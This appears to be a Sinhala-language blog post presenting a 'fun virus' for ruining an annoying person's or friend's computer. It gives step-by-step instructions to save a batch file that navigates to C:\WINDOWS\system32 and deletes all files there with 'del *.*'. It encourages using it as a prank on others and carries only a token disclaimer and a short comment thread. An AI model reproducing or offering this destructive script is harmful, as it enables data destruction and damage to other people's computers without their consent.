තරහකාරයෙක්ගෙ පරිගණකය ඉවරයක් කරමු.



  Fun Virus එකක් හදමු.


මේක පුංචිම පුංචි Virus එකක්. හැබැයි Fun කියලා තිබුනට මේකෙ Fun එකක් නම් නෑ. අපේ පරිගණකයේ Run වුනොත් නම් ඉදලා ඉවරයි. මේකෙන් වෙන්නේ අපේ පරිගණකයේ System32 මකලා දාන එකයි. මේක යාළුවන්ට කෙලවන්න නම් පට්ට. පටන් ගන්න කලින් කියන්න ඕන මේක නිසා පරිගණකට මොනා හරි වුනොත් මම නම් වග කියන්නේ නෑ. හරි ඉතින් කියෙව්වා ඇති වැඩේ පටන් ගමු නේද?



මුලින්ම Notepad එක Open කරගන්නකෝ

දැන් මේ පල්ලෙහා දාලා තියන Code එක Copy කරලා Paste කරගන්න.

cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd C:\WINDOWS\system32
del *.*

හරිනේ දැන් මේක කැමති තැනක Save කරගන්න. Save කරද්දි CMD එකක් විදිහට Save කරන්න. (උදා - Run.CMD)

හරි දැන් ඉතින් ඕක Run කරන්න නම් යන්න එපා. Run කලොත් නම් ඉදලා ඉවරයි.

ආයෙත් කිවුවා මේක නිසා පරිගණකට මොනා හරි වුනොත් මම නම් වග කියන්නේ නෑ.

අපි අළුතෙන්ම පටන් ගත්ත Hip-Pop Site එක බලන්න මෙතනින් යන්න....

අදට ගිහිල්ලා එන්නම්.

Comment එකක් දාගෙනම යන්න.
Previous
Next Post »

1 comments (අදහස්):

Click here for comments (අදහස්)
September 2, 2015 at 5:38 PM ×

GOOD

Congrats bro සිසිර කුමාර you got PERTAMAX...! hehehehe...
Reply
avatar


බැලුවද?

Comment එකකුත් දාගෙනම යමු නේ.....
ConversionConversion EmoticonEmoticon